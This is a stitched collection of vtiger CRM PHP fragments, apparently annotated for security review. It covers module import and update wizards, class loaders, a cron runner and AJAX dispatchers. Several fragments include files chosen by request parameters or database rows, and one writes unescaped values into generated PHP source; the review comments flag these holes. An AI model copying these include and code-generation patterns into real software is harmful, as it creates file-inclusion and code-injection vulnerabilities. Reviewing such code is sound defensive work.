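/**
 * Final step of the module update wizard: applies an already-uploaded package
 * file and then removes it from the upload directory.
 *
 * Reads three request parameters: module_import_name, module_import_file and
 * module_import_type. 'language' and 'layout' packages are imported; any other
 * type is applied as an update to the named module. The outcome is emitted
 * through Vtiger_Response.
 *
 * @param Vtiger_Request $request
 */
public function updateUserModuleStep3(Vtiger_Request $request) {
    $importModuleName = $request->get('module_import_name');

    // module_import_file is supplied by the client and is joined into a path
    // that is imported and then unlink()ed. Keep only its final path component
    // so directory parts such as "../" cannot move the path out of the upload
    // directory. Names produced by the upload step are plain file names, so
    // legitimate requests are unaffected.
    $uploadFile = basename((string) $request->get('module_import_file'));
    $uploadDir = Settings_ModuleManager_Module_Model::getUploadDirectory();
    $uploadFileName = "{$uploadDir}/{$uploadFile}";
    // checkFileAccess() is defined elsewhere; what it enforces is not visible here.
    checkFileAccess($uploadFileName);

    $importType = strtolower($request->get('module_import_type'));
    if ($importType == 'language') {
        $package = new Vtiger_Language();
    } elseif ($importType == 'layout') {
        vimport('vtlib.Vtiger.Layout');
        $package = new Vtiger_Layout();
    } else {
        $package = new Vtiger_Package();
    }

    if ($importType == 'language' || $importType == 'layout') {
        $package->import($uploadFileName);
    } else {
        $package->update(Vtiger_Module::getInstance($importModuleName), $uploadFileName);
    }

    // The uploaded archive is single-use: remove it once it has been applied.
    checkFileAccessForDeletion($uploadFileName);
    unlink($uploadFileName);

    $result = array('success' => true, 'importModuleName' => $importModuleName);
    $response = new Vtiger_Response();
    $response->setResult($result);
    $response->emit();
}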
/**
 * Create a provider object from its class name, loading
 * providers/<name>.php next to this file when the class is not defined yet.
 *
 * NOTE(review): $providername selects both the file that is included and the
 * class that is instantiated. Whether callers restrict it to known provider
 * names is not visible here - confirm at the call sites.
 *
 * @param string $providername provider class name (surrounding whitespace is trimmed)
 * @return object|false new provider instance, or false when the name is empty
 */
static function getInstance($providername) {
    if (empty($providername)) {
        return false;
    }

    $providername = trim($providername);
    $providerFile = dirname(__FILE__) . "/providers/{$providername}.php";

    // The access check runs before the class lookup, so it applies even when
    // the class is already loaded and nothing gets included.
    checkFileAccess($providerFile);

    $alreadyDefined = class_exists($providername);
    if (!$alreadyDefined) {
        include_once $providerFile;
    }

    return new $providername();
}
/**
 * Return a new instance of the class that backs a module.
 *
 * 'Calendar' and 'Events' both map to the Activity class stored under
 * modules/Calendar; every other module uses a class named after itself in
 * modules/<module>/<module>.php.
 *
 * NOTE(review): $module becomes part of a required path and the name of the
 * class that is instantiated; whether it is validated before reaching this
 * method is not visible here.
 *
 * @param string $module module name
 * @return object instance of the module class
 */
static function getInstance($module) {
    $className = $module;

    // Loose comparison is intentional to match the historical behaviour.
    if (in_array($module, array('Calendar', 'Events'))) {
        $module = 'Calendar';
        $className = 'Activity';
    }

    if (!class_exists($className)) {
        // File access security check, applied to the exact path that is required.
        $classFile = "modules/{$module}/{$className}.php";
        checkFileAccess($classFile);
        require_once $classFile;
    }

    return new $className();
}
/**
 * Load every non-deleted mobile alert handler registered in
 * vtiger_mobile_alerts and return one instance per handler.
 *
 * NOTE(review): handler_path and handler_class come straight from the
 * database row. Apart from file_exists() and checkFileAccess() nothing here
 * constrains them, so write access to that table decides which file is
 * included and which class is instantiated.
 *
 * @return array list of alert model objects, each with ->alertid set
 */
static function models() {
    global $adb;

    $models = array();
    $rows = $adb->pquery("SELECT * FROM vtiger_mobile_alerts WHERE deleted = 0", array());
    if (!$adb->num_rows($rows)) {
        return $models;
    }

    while ($row = $adb->fetch_array($rows)) {
        $handlerFile = $row['handler_path'];
        if (!file_exists($handlerFile)) {
            // Handlers whose file is missing are skipped silently.
            continue;
        }

        checkFileAccess($handlerFile);
        include_once $handlerFile;

        $handlerClass = $row['handler_class'];
        $alert = new $handlerClass();
        $alert->alertid = $row['id'];
        $models[] = $alert;
    }

    return $models;
}
/**
 * Second step of the module import wizard: stores the uploaded zip in the
 * upload directory, reads the package metadata and hands it to the
 * ImportUserModuleStep2.tpl template.
 *
 * The stored file name is generated here ('usermodule_<time()>.zip'); the
 * client-side file name is not used.
 *
 * NOTE(review): nothing in this method inspects $_FILES['moduleZip']['error']
 * or the size/type of the upload; rejection relies on move_uploaded_file()
 * and on getModuleNameFromZip() returning null.
 * NOTE(review): the name is derived from time() only, so two uploads in the
 * same second resolve to the same path.
 *
 * @param Vtiger_Request $request
 */
public function importUserModuleStep2(Vtiger_Request $request) {
    $viewer = $this->getViewer($request);
    $uploadDir = Settings_ModuleManager_Extension_Model::getUploadDirectory();
    $qualifiedModuleName = $request->getModule(false);
    $uploadFile = 'usermodule_' . time() . '.zip';
    $uploadFileName = "{$uploadDir}/{$uploadFile}";
    // The check is applied to the directory, not to the file path built above.
    checkFileAccess($uploadDir);
    if (!move_uploaded_file($_FILES['moduleZip']['tmp_name'], $uploadFileName)) {
        $viewer->assign('MODULEIMPORT_FAILED', true);
    } else {
        $package = new Vtiger_Package();
        $importModuleName = $package->getModuleNameFromZip($uploadFileName);
        $importModuleDepVtVersion = $package->getDependentVtigerVersion();
        if ($importModuleName == null) {
            // Not a recognisable package: report the failure and remove the upload.
            $viewer->assign('MODULEIMPORT_FAILED', true);
            $viewer->assign("MODULEIMPORT_FILE_INVALID", true);
            checkFileAccessForDeletion($uploadFileName);
            unlink($uploadFileName);
        } else {
            // This information is needed to offer an update when the module is already present.
            // The license text comes from the uploaded package, so it is purified before display.
            $moduleLicence = vtlib_purify($package->getLicense());
            $viewer->assign("MODULEIMPORT_FILE", $uploadFile);
            $viewer->assign("MODULEIMPORT_TYPE", $package->type());
            $viewer->assign("MODULEIMPORT_NAME", $importModuleName);
            $viewer->assign("MODULEIMPORT_DEP_VTVERSION", $importModuleDepVtVersion);
            $viewer->assign("MODULEIMPORT_LICENSE", $moduleLicence);
            if (!$package->isLanguageType() && !$package->isModuleBundle()) {
                $moduleInstance = Vtiger_Module::getInstance($importModuleName);
                $moduleimport_exists = $moduleInstance ? "true" : "false";
                // NOTE(review): $importModuleName is read from the uploaded package and is
                // used in a filesystem path here; confirm the package reader limits it to
                // a plain module name.
                $moduleimport_dir_name = "modules/{$importModuleName}";
                $moduleimport_dir_exists = is_dir($moduleimport_dir_name) ? "true" : "false";
                $viewer->assign("MODULEIMPORT_EXISTS", $moduleimport_exists);
                $viewer->assign("MODULEIMPORT_DIR", $moduleimport_dir_name);
                $viewer->assign("MODULEIMPORT_DIR_EXISTS", $moduleimport_dir_exists);
            }
        }
    }
    $viewer->view('ImportUserModuleStep2.tpl', $qualifiedModuleName);
}
/**
 * Tell whether a module is a custom module.
 *
 * Loads modules/<name>/<name>.php when that file exists, instantiates the
 * class of the same name and reports its IsCustomModule property.
 *
 * NOTE(review): $moduleName is used in an include path and as a class name;
 * checkFileAccess() is only applied when that function is defined.
 *
 * @param string $moduleName
 * @return bool true when the module class sets a truthy IsCustomModule, false
 *              otherwise (including when the module file does not exist)
 */
function vtlib_isCustomModule($moduleName) {
    $classFile = "modules/{$moduleName}/{$moduleName}.php";

    if (!file_exists($classFile)) {
        return false;
    }

    if (function_exists('checkFileAccess')) {
        checkFileAccess($classFile);
    }
    include_once $classFile;

    $instance = new $moduleName();
    return isset($instance->IsCustomModule) && $instance->IsCustomModule;
}
// Fragment of a front controller: publishes login-related cookies, serves
// document downloads, then includes the page header. It ends inside an open
// block that continues beyond this excerpt.

// Cookies are scoped to the host part of the configured site URL.
$siteURLParts = parse_url($site_URL);
$cookieDomain = $siteURLParts['host'];
// setcookie() arguments below: expires 0 (session cookie), path null,
// domain $cookieDomain, secure false, httponly true.
// NOTE(review): with secure=false these cookies are also sent over plain HTTP;
// on an HTTPS-only deployment the Secure flag should be set.
if (isset($_SESSION['authenticated_user_id'])) {
    // NOTE(review): the user id is written to the debug log and to a cookie.
    // Confirm nothing treats ck_login_id_vtiger as proof of identity, since a
    // cookie value is under the client's control.
    $log->debug("setting cookie ck_login_id_vtiger to " . $_SESSION['authenticated_user_id']);
    setcookie('ck_login_id_vtiger', $_SESSION['authenticated_user_id'], 0, null, $cookieDomain, false, true);
}
if (isset($_SESSION['vtiger_authenticated_user_theme'])) {
    $log->debug("setting cookie ck_login_theme_vtiger to " . $_SESSION['vtiger_authenticated_user_theme']);
    setcookie('ck_login_theme_vtiger', $_SESSION['vtiger_authenticated_user_theme'], 0, null, $cookieDomain, false, true);
}
if (isset($_SESSION['authenticated_user_language'])) {
    $log->debug("setting cookie ck_login_language_vtiger to " . $_SESSION['authenticated_user_language']);
    setcookie('ck_login_language_vtiger', $_SESSION['authenticated_user_language'], 0, null, $cookieDomain, false, true);
}
// Document downloads bypass the normal page rendering. The included path is a
// constant, so the request only decides whether this branch is taken.
if ($_REQUEST['module'] == 'Documents' && $action == 'DownloadFile') {
    checkFileAccess('modules/Documents/DownloadFile.php');
    include 'modules/Documents/DownloadFile.php';
    exit;
}
// Skip headers for popups, deleting, saving, importing and other actions
if (!$skipHeaders) {
    $log->debug("including headers");
    if ($use_current_login) {
        if (isset($_REQUEST['category']) && $_REQUEST['category'] != '') {
            // Request value is purified before it is used further.
            $category = vtlib_purify($_REQUEST['category']);
        } else {
            $category = getParentTabFromModule($currentModule);
        }
        include 'modules/Vtiger/header.php';
    }
    if (isset($_SESSION['administrator_error'])) {
/**
 * Customer portal function: generate the Quotes/Invoice PDF for a record and
 * return its content.
 *
 * The PDF is produced by including modules/<block>/CreatePDF.php with
 * $_REQUEST['record'] and $_REQUEST['savemode'] preset, which is expected to
 * write test/product/<id>_<block>.pdf; that file is read, base64-encoded and
 * deleted.
 *
 * NOTE(review): check_permission() runs before validateSession(), so the
 * permission result is returned to callers whose session has not been
 * validated yet; consider validating the session first.
 * NOTE(review): $block and $id are used in an include path and in a file name
 * that is unlink()ed. Confirm check_permission() limits $block to known module
 * names and $id to a record id.
 * NOTE(review): the global $current_user is replaced by the 'admin' user for
 * the PDF generation and is not restored in this function.
 *
 * @param mixed $id record id
 * @param string $block module name, used as modules/<block>/CreatePDF.php
 * @param mixed $customerid portal customer id
 * @param mixed $sessionid portal session id
 * @return array|string|null array("#NOT AUTHORIZED#") when permission is
 *         denied, null when the session is invalid, an array holding the
 *         base64-encoded PDF on success, or the string "failure"
 */
function get_pdf($id, $block, $customerid, $sessionid) {
    global $adb;
    global $current_user, $log, $default_language;
    global $currentModule, $mod_strings, $app_strings, $app_list_strings;
    $log->debug("Entering customer portal function get_pdf");
    $isPermitted = check_permission($customerid, $block, $id);
    if ($isPermitted == false) {
        return array("#NOT AUTHORIZED#");
    }
    if (!validateSession($customerid, $sessionid)) {
        return null;
    }
    require_once "modules/Users/Users.php";
    require_once "config.inc.php";
    // The included CreatePDF.php script works on globals, so the admin user and
    // the language tables are set up as globals before it runs.
    $seed_user = new Users();
    $user_id = $seed_user->retrieve_user_id('admin');
    $current_user = $seed_user;
    $current_user->retrieveCurrentUserInfoFromFile($user_id);
    $currentModule = $block;
    $current_language = $default_language;
    $app_strings = return_application_language($current_language);
    $app_list_strings = return_app_list_strings_language($current_language);
    $mod_strings = return_module_language($current_language, $currentModule);
    $_REQUEST['record'] = $id;
    $_REQUEST['savemode'] = 'file';
    $filenamewithpath = 'test/product/' . $id . '_' . $block . '.pdf';
    // Remove a leftover file from an earlier run so stale content is never returned.
    if (file_exists($filenamewithpath) && filesize($filenamewithpath) != 0) {
        unlink($filenamewithpath);
    }
    checkFileAccess("modules/{$block}/CreatePDF.php");
    include "modules/{$block}/CreatePDF.php";
    if (file_exists($filenamewithpath) && filesize($filenamewithpath) != 0) {
        // The file content itself is passed back to the caller.
        $filecontents[] = base64_encode(file_get_contents($filenamewithpath));
        unlink($filenamewithpath);
        // TODO: Delete the file to avoid public access.
        // NOTE(review): until the unlink() above runs, the PDF sits under
        // test/product/ with a name derived from the record id and module.
    } else {
        $filecontents = "failure";
    }
    $log->debug("Exiting customer portal function get_pdf");
    return $filecontents;
}
/**
 * Build an extension model for an extension id.
 *
 * With $fileName given, the model only references that file name and nothing
 * is downloaded; this needs the upload directory to exist. Without it, the
 * upload directory is created when missing and the package is downloaded to
 * 'usermodule_<time()>.zip' inside it.
 *
 * NOTE(review): checkFileAccess() receives the upload directory in both
 * branches; the path built from $fileName is computed but never checked or
 * used here, so callers should make sure $fileName is a bare file name.
 *
 * @param <Integer> $extensionId
 * @param <String> $fileName
 * @return <Settings_ModuleManager_Extension_Model>|false the model, or false
 *         when the directory is missing or the download did not succeed
 */
public static function getInstanceById($extensionId, $fileName = false) {
    $uploadDir = self::getUploadDirectory();

    if (!$fileName) {
        // Download path: make sure the target directory exists first.
        if (!is_dir($uploadDir)) {
            mkdir($uploadDir);
        }
        $uploadFile = 'usermodule_' . time() . '.zip';
        $uploadFileName = $uploadDir . '/' . $uploadFile;
        checkFileAccess(self::getUploadDirectory());

        $packageAvailable = Settings_ModuleManager_Extension_Model::download($extensionId, $uploadFileName);
        if (!$packageAvailable) {
            return false;
        }

        $extensionModel = new self();
        $extensionModel->setId($extensionId)->setFileName($uploadFile);
        return $extensionModel;
    }

    // Existing-file path: only meaningful when the upload directory is there.
    if (!is_dir($uploadDir)) {
        return false;
    }
    $uploadFileName = $uploadDir . '/' . $fileName;
    checkFileAccess(self::getUploadDirectory());

    $extensionModel = new self();
    $extensionModel->setId($extensionId)->setFileName($fileName);
    return $extensionModel;
}
try { $cronTask->setBulkMode(true); // Not ready to run yet? if (!$cronTask->isRunnable()) { echo sprintf("[INFO] %s - not ready to run as the time to run again is not completed\n", $cronTask->getName()); continue; } // Timeout could happen if intermediate cron-tasks fails // and affect the next task. Which need to be handled in this cycle. if ($cronTask->hadTimedout()) { echo sprintf("[INFO] %s - cron task had timedout as it is not completed last time it run- restarting\n", $cronTask->getName()); } // Mark the status - running $cronTask->markRunning(); echo sprintf('[CRON],"%s",%s,%s,"%s","",[STARTS]', $cronRunId, $site_URL, $cronTask->getName(), date('Y-m-d H:i:s', $cronTask->getLastStart())) . "\n"; checkFileAccess($cronTask->getHandlerFile()); require_once $cronTask->getHandlerFile(); // Mark the status - finished $cronTask->markFinished(); echo "\n" . sprintf('[CRON],"%s",%s,%s,"%s","%s",[ENDS]', $cronRunId, $site_URL, $cronTask->getName(), date('Y-m-d H:i:s', $cronTask->getLastStart()), date('Y-m-d H:i:s', $cronTask->getLastEnd())) . "\n"; } catch (Exception $e) { echo sprintf("[ERROR]: %s - cron task execution throwed exception.\n", $cronTask->getName()); echo $e->getMessage(); echo "\n"; } } $cronEnds = date('Y-m-d H:i:s'); echo sprintf('[CRON],"%s",%s,Instance,"%s","%s",[ENDS]', $cronRunId, $site_URL, $cronStarts, $cronEnds) . "\n"; } else { echo "Access denied!"; }
// Tail of a script that generates modules/Emails/templates/testemailtemplateusage.php:
// the current user's column values are appended to $myString as PHP
// assignments, the file is written, and the browser is redirected to the
// TemplateMerge action. $myString, $n, $j, $module and $colName are set
// earlier, outside this excerpt.
$result = $adb->pquery($query, array($current_user->id));
$res_row = $adb->fetchByAssoc($result);
foreach ($res_row as $columnName => $value) {
    // FLAG(review): $value is placed between double quotes in generated PHP
    // source without any escaping. A value containing a double quote, a
    // backslash or a "$" changes the code of the generated file. Emitting the
    // value with var_export(), or not generating PHP at all, removes that risk.
    $myString .= '$users_' . $columnName . ' = "' . $value . "\";\n\n";
    $usercolName[$n] = $columnName;
    $n++;
    $m = $n;
}
// Emit a $globals string that lists every generated variable name.
$myString .= "\$globals = \"";
for ($i = 0; $i < $j - 1; $i++) {
    $myString .= "\\\$" . $module . "_" . $colName[$i] . ", ";
}
for ($n = 0; $n < $m; $n++) {
    $myString .= '\\$users_' . $usercolName[$n] . ", ";
}
// The last module column is appended without a trailing separator.
$myString .= "\\\$" . $module . "_" . $colName[$i];
$myString .= "\"; \n\n";
$myString .= "?> \n";
// NOTE(review): the "@" hides fopen() failures, so an unwritable template
// directory silently leaves the previous file in place.
if ($is_writable && ($config_file = @fopen($root_directory . '/modules/Emails/templates/testemailtemplateusage.php', "w"))) {
    $log->debug("writing to the testemailtemplatuseage.php file");
    fputs($config_file, $myString, strlen($myString));
    fclose($config_file);
}
// NOTE(review): templatename is taken from the request unmodified; it is
// checked by checkFileAccess() (defined elsewhere) and then placed, together
// with the server's root directory and without URL encoding, into the Location
// header. That discloses the filesystem path to the client; urlencode() and
// basename() on the request value would be the usual hardening.
checkFileAccess($root_directory . '/modules/Emails/templates/' . $_REQUEST["templatename"]);
$templatename = $root_directory . '/modules/Emails/templates/' . $_REQUEST["templatename"];
header("Location:index.php?module=Users&action=TemplateMerge&templatename=" . $templatename);
?> <script> window.close() </script>
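/**
 * Final step of the module update wizard: applies an already-uploaded package
 * file, removes it from the upload directory and renders
 * UpdateUserModuleStep3.tpl.
 *
 * Reads three request parameters: module_import_name, module_import_file and
 * module_import_type. A 'language' package is imported; any other type is
 * applied as an update to the named module.
 *
 * @param Vtiger_Request $request
 */
public function updateUserModuleStep3(Vtiger_Request $request) {
    $viewer = $this->getViewer($request);
    $qualifiedModuleName = $request->getModule(false);
    $importModuleName = $request->get('module_import_name');

    // module_import_file is supplied by the client and is joined into a path
    // that is imported and then unlink()ed. Keep only its final path component
    // so directory parts such as "../" cannot move the path out of the upload
    // directory. Names produced by the upload step are plain file names, so
    // legitimate requests are unaffected.
    $uploadFile = basename((string) $request->get('module_import_file'));
    $uploadDir = Settings_ModuleManager_Extension_Model::getUploadDirectory();
    $uploadFileName = "{$uploadDir}/{$uploadFile}";
    // checkFileAccess() is defined elsewhere; what it enforces is not visible here.
    checkFileAccess($uploadFileName);

    $importType = $request->get('module_import_type');
    $isLanguagePackage = strtolower($importType) == 'language';
    if ($isLanguagePackage) {
        $package = new Vtiger_Language();
        $package->import($uploadFileName);
    } else {
        $package = new Vtiger_Package();
        $package->update(Vtiger_Module::getInstance($importModuleName), $uploadFileName);
    }

    // The uploaded archive is single-use: remove it once it has been applied.
    checkFileAccessForDeletion($uploadFileName);
    unlink($uploadFileName);

    $viewer->assign("UPDATE_MODULE_NAME", $importModuleName);
    $viewer->assign('QUALIFIED_MODULE', $qualifiedModuleName);
    $viewer->view('UpdateUserModuleStep3.tpl', $qualifiedModuleName);
}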
?> <?php if (is_file($filename)) { checkFileAccess($filename); include $filename; } else { if ($_SESSION['customer_id'] != '') { $permission = array(); // Look if we have the information already if (isset($_SESSION['__permitted_modules'])) { $permission = $_SESSION['__permitted_modules']; // Store for further re-use $_SESSION['__permitted_modules'] = $permission; } else { // Get the information from server $params = array(); $permission = $client->call('get_modules', $params, $Server_path, $Server_path); } $module = $permission[0]; checkFileAccess("{$module}/index.php"); include "{$module}/index.php"; } } if (!$isAjax) { include "footer.html"; } } else { header("Location: login.php"); } }
/**
 * Build an extension model for an extension id.
 *
 * With $fileName given, the model only references that file name and nothing
 * is downloaded; this needs the upload directory to exist. Without it, the
 * upload directory is created when missing and the package is downloaded to
 * 'usermodule_<time()>.zip' inside it.
 *
 * The return shape differs per path: the $fileName path returns the model
 * itself (or false), the download path returns a status array.
 *
 * NOTE(review): checkFileAccess() receives the upload directory in both
 * branches; the path built from $fileName is computed but never checked or
 * used here, so callers should make sure $fileName is a bare file name.
 *
 * @param <Integer> $extensionId
 * @param <Boolean> $trial passed through to download()
 * @param <String> $fileName
 * @return <Settings_ExtensionStore_Extension_Model>|array|false model for an
 *         existing file; array('success' => true, 'result' => model) or
 *         array('success' => false, 'message' => ...) after a download; false
 *         when $fileName is given but the upload directory is missing
 */
public function getInstanceById($extensionId, $trial = false, $fileName = false) {
    $uploadDir = self::getUploadDirectory();

    if (!$fileName) {
        // Download path: make sure the target directory exists first.
        if (!is_dir($uploadDir)) {
            mkdir($uploadDir);
        }
        $uploadFile = 'usermodule_' . time() . '.zip';
        $uploadFileName = $uploadDir . '/' . $uploadFile;
        checkFileAccess(self::getUploadDirectory());

        $response = $this->download($extensionId, $trial, $uploadFileName);
        if (!$response['success']) {
            return array('success' => false, 'message' => $response['message']);
        }

        $extensionModel = new self();
        $extensionModel->setId($extensionId)->setFileName($uploadFile);
        return array('success' => true, 'result' => $extensionModel);
    }

    // Existing-file path: only meaningful when the upload directory is there.
    if (!is_dir($uploadDir)) {
        return false;
    }
    $uploadFileName = $uploadDir . '/' . $fileName;
    checkFileAccess(self::getUploadDirectory());

    $extensionModel = new self();
    $extensionModel->setId($extensionId)->setFileName($fileName);
    return $extensionModel;
}
exit;
}
// Fragment of an AJAX endpoint (the log line below names WebmailsAjax.php). It
// starts and ends inside blocks that continue beyond this excerpt.

// FLAG(review): both path components come straight from the request and the
// resulting file is executed. The only visible control is checkFileAccess(),
// whose rules are defined elsewhere. Restricting 'module' and 'file' to plain
// identifiers, or to a fixed list of files this endpoint is meant to serve,
// would not depend on that helper alone.
if (isset($_REQUEST['file']) && $_REQUEST['file'] != '' && !isset($_REQUEST['ajax'])) {
    checkFileAccess("modules/" . $_REQUEST['module'] . "/" . $_REQUEST['file'] . ".php");
    require_once "modules/" . $_REQUEST['module'] . "/" . $_REQUEST['file'] . ".php";
    exit;
}
$mailid = vtlib_purify($_REQUEST["mailid"]);
// Default to the INBOX folder when no mailbox is named.
if (isset($_REQUEST["mailbox"]) && $_REQUEST["mailbox"] != "") {
    $mailbox = vtlib_purify($_REQUEST["mailbox"]);
} else {
    $mailbox = "INBOX";
}
$adb->println("Inside WebmailsAjax.php");
// FLAG(review): same request-driven include as above, this time for AJAX posts.
if (isset($_POST["file"]) && $_POST["ajax"] == "true") {
    checkFileAccess("modules/" . $_REQUEST["module"] . "/" . $_POST["file"] . ".php");
    require_once "modules/" . $_REQUEST["module"] . "/" . $_POST["file"] . ".php";
}
if (isset($_REQUEST["command"]) && $_REQUEST["command"] != "") {
    // The command is only compared against fixed strings in the visible code.
    $command = $_REQUEST["command"];
    if ($command == "expunge") {
        // Expunge the mailbox, then reopen it so the list reflects the result.
        $MailBox = new MailBox($mailbox);
        imap_expunge($MailBox->mbox);
        $MailBox = new MailBox($mailbox);
        $elist = $MailBox->mailList;
        $num_mails = $elist['count'];
        $start_page = cal_start($num_mails, $MailBox->mails_per_page);
        imap_close($MailBox->mbox);
        echo $start_page;
        flush();
        exit;
<?php
/*+********************************************************************************
 * The contents of this file are subject to the vtiger CRM Public License Version 1.0
 * ("License"); You may not use this file except in compliance with the License
 * The Original Code is: vtiger CRM Open Source
 * The Initial Developer of the Original Code is vtiger.
 * Portions created by vtiger are Copyright (C) vtiger.
 * All Rights Reserved.
 ********************************************************************************/
// Settings AJAX dispatcher. The excerpt ends inside the announcement branch.

// FLAG(review): the 'file' request parameter selects which script under
// modules/Settings/ is executed. The only visible control is checkFileAccess(),
// whose rules are defined elsewhere; limiting 'file' to a fixed list of
// scripts meant to be reachable this way would not depend on that helper alone.
if (isset($_REQUEST['file']) && $_REQUEST['file'] != '') {
    checkFileAccess('modules/Settings/' . $_REQUEST['file'] . '.php');
    require_once 'modules/Settings/' . $_REQUEST['file'] . '.php';
}
if (isset($_REQUEST['orgajax']) && $_REQUEST['orgajax'] != '') {
    require_once 'modules/Settings/CreateSharingRule.php';
} elseif (isset($_REQUEST['announce_save']) && $_REQUEST['announce_save'] != '') {
    $date_var = date('Y-m-d H:i:s');
    $announcement = vtlib_purify(from_html($_REQUEST['announcement']));
    // Change ##$## to & (the reverse is done in Smarty/templates/Settings/Announcements.tpl)
    // NOTE(review): this replacement happens after vtlib_purify(), so the "&"
    // it introduces is not seen by the purifier.
    $announcement = str_replace("##\$##", "&", $announcement);
    // NOTE(review): $title is purified but not used in either parameter list
    // below; both store the literal 'announcement' as the title.
    $title = vtlib_purify($_REQUEST['title_announcement']);
    // One announcement row per creator: update it when present, insert otherwise.
    $sql = "select * from vtiger_announcement where creatorid=?";
    $is_announce = $adb->pquery($sql, array($current_user->id));
    if ($adb->num_rows($is_announce) > 0) {
        $query = "update vtiger_announcement set announcement=?,time=?,title=? where creatorid=?";
        $params = array($announcement, $adb->formatDate($date_var, true), 'announcement', $current_user->id);
    } else {
        $query = "insert into vtiger_announcement values (?,?,?,?)";
        $params = array($current_user->id, $announcement, 'announcement', $adb->formatDate($date_var, true));
    }
********************************************************************************/ require_once 'include/CustomFieldUtil.php'; require_once 'Smarty_setup.php'; global $mod_strings, $app_strings, $app_list_strings, $theme, $adb, $log; $theme_path = "themes/" . $theme . "/"; require_once $theme_path . 'layout_utils.php'; $tabid = vtlib_purify($_REQUEST['tabid']); $blockid = vtlib_purify($_REQUEST['blockid']); $mode = vtlib_purify($_REQUEST['mode']); $readonly = ''; $smarty = new vtigerCRM_Smarty(); if ($_REQUEST['mode'] == 'edit') { $sql = 'SELECT blocklabel FROM vtiger_blocks WHERE blockid = ?'; $res = $adb->pquery($sql, array($_REQUEST['blockid'])); $row = $adb->fetch_array($res); checkFileAccess('modules/' . $_REQUEST['fld_module'] . '/language/' . $_SESSION['authenticated_user_language'] . '.lang.php'); include 'modules/' . $_REQUEST['fld_module'] . '/language/' . $_SESSION['authenticated_user_language'] . '.lang.php'; $blockLabel = $mod_strings[$row["blocklabel"]]; } $blockQuery = 'SELECT blocklabel,blockid FROM vtiger_blocks WHERE tabid = ?'; $block = $adb->pquery($blockQuery, array($_REQUEST['tabid'])); $blocknum = $adb->num_rows($block); $smarty->assign("MOD", $mod_strings); $smarty->assign("APP", $app_strings); $smarty->assign("FLD_MODULE", vtlib_purify($_REQUEST['fld_module'])); $output = ''; $output .= '<div id="orgLay" style="display:block;" class="layerPopup"><script language="JavaScript" type="text/javascript" src="include/js/customview.js"></script> <form action="index.php" method="post" name="addtodb" onsubmit="VtigerJS_DialogBox.block();"> <input type="hidden" name="module" value="Settings"> <input type="hidden" name="fld_module" value="' . vtlib_purify($_REQUEST['fld_module']) . '"> <input type="hidden" name="parenttab" value="Settings">
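<?php
/*+********************************************************************************
 * The contents of this file are subject to the vtiger CRM Public License Version 1.0
 * ("License"); You may not use this file except in compliance with the License
 * The Original Code is: vtiger CRM Open Source
 * The Initial Developer of the Original Code is vtiger.
 * Portions created by vtiger are Copyright (C) vtiger.
 * All Rights Reserved.
 ********************************************************************************/
// Thin entry point that delegates to the ListView.php script of the module
// named in the request.
global $theme;
$theme_path = "themes/" . $theme . "/";
$image_path = $theme_path . "images/";

// The module name comes from the request and decides which script is executed.
// Accept only a plain identifier so the value cannot add directory parts to the
// path; checkFileAccess() (defined elsewhere) remains as a second check.
$requestedListModule = isset($_REQUEST['module']) ? $_REQUEST['module'] : '';
if (!is_string($requestedListModule) || !preg_match('/^[A-Za-z0-9_]+$/', $requestedListModule)) {
    die('Invalid module name');
}

// Build the path once so the checked path and the required path cannot differ.
$requestedListViewFile = 'modules/' . $requestedListModule . '/ListView.php';
checkFileAccess($requestedListViewFile);
require_once $requestedListViewFile;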
/**
 * Create the SQL query used to export this module's records.
 *
 * Joins the module table (and its custom field table, when set) with
 * vtiger_crmentity, groups and users, adds a LEFT JOIN for every module linked
 * through a uitype 10 field, and appends the caller's condition plus the
 * "not deleted" filter. For non-admin users whose privilege files match the
 * condition near the end, getListViewSecurityParameter() is appended as well.
 *
 * NOTE(review): $where is inserted into the statement verbatim. It has to be
 * a trusted, already-escaped SQL fragment; nothing in this method validates it.
 * NOTE(review): the module name is read from $_REQUEST['module'] and not
 * from the object itself.
 *
 * @param string $where SQL condition without the WHERE keyword; may be empty
 * @return string the export query
 */
function create_export_query($where) {
    global $current_user;
    $thismodule = $_REQUEST['module'];
    include "include/utils/ExportUtils.php";
    // Get the permitted-fields query and, from it, the permitted field list.
    $sql = getPermittedFieldsQuery($thismodule, "detail_view");
    $fields_list = getFieldsListFromQuery($sql);
    $query = "SELECT {$fields_list}, vtiger_users.user_name AS user_name \n\t\t\t\t\tFROM vtiger_crmentity INNER JOIN {$this->table_name} ON vtiger_crmentity.crmid={$this->table_name}.{$this->table_index}";
    // customFieldTable is read as array(table name, key column).
    if (!empty($this->customFieldTable)) {
        $query .= " INNER JOIN " . $this->customFieldTable[0] . " ON " . $this->customFieldTable[0] . '.' . $this->customFieldTable[1] . " = {$this->table_name}.{$this->table_index}";
    }
    $query .= " LEFT JOIN vtiger_groups ON vtiger_groups.groupid = vtiger_crmentity.smownerid";
    $query .= " LEFT JOIN vtiger_users ON vtiger_crmentity.smownerid = vtiger_users.id and vtiger_users.status='Active'";
    // Related modules are looked up with a bound parameter.
    $linkedModulesQuery = $this->db->pquery("SELECT distinct fieldname, columnname, relmodule FROM vtiger_field" . " INNER JOIN vtiger_fieldmodulerel ON vtiger_fieldmodulerel.fieldid = vtiger_field.fieldid" . " WHERE uitype='10' AND vtiger_fieldmodulerel.module=?", array($thismodule));
    $linkedFieldsCount = $this->db->num_rows($linkedModulesQuery);
    for ($i = 0; $i < $linkedFieldsCount; $i++) {
        $related_module = $this->db->query_result($linkedModulesQuery, $i, 'relmodule');
        $fieldname = $this->db->query_result($linkedModulesQuery, $i, 'fieldname');
        $columnname = $this->db->query_result($linkedModulesQuery, $i, 'columnname');
        // The related module name comes from vtiger_fieldmodulerel; it selects
        // the file that is required and the class that is instantiated.
        checkFileAccess("modules/{$related_module}/{$related_module}.php");
        require_once "modules/{$related_module}/{$related_module}.php";
        $other = new $related_module();
        vtlib_setup_modulevars($related_module, $other);
        $query .= " LEFT JOIN {$other->table_name} ON {$other->table_name}.{$other->table_index} = {$this->table_name}.{$columnname}";
    }
    $where_auto = " vtiger_crmentity.deleted=0";
    if ($where != '') {
        $query .= " WHERE ({$where}) AND {$where_auto}";
    } else {
        $query .= " WHERE {$where_auto}";
    }
    // These per-user files define $is_admin, $profileGlobalPermission and
    // $defaultOrgSharingPermission used below - presumably; confirm against the
    // generated privilege files.
    require 'user_privileges/user_privileges_' . $current_user->id . '.php';
    require 'user_privileges/sharing_privileges_' . $current_user->id . '.php';
    // Security Check for Field Access
